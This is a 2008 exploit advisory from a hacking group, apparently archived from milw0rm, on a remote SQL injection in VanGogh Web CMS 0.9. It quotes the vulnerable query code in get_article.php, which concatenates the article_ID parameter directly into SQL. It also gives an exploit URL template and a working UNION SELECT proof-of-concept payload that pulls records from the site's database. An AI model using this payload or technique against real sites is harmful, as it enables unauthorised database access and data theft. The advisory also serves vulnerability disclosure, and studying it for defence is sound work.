===================================================================
VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability
===================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 1 July 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : VanGogh Web CMS
VERSION : 0.9
VENDOR : http://vangogh.holoclan.de/
DOWNLOAD : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip
#####################################################
--- Remote SQL Injection ---
-----------------------------------
Vulnerable File (get_article.php)
-----------------------------------
@Line
337: $sql='SELECT text.content, article.lastchanged, parttypes.tag'
338: .' FROM article,T_A,text,parttypes'
339: .' WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID;
340:
341: $result=mysql_query($sql,$db) or die("$sql : Parse template Query funktioniert ned");
---------
Exploit
---------
[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article§ion=5
------
POC
------
[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article§ion=5
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-07-01]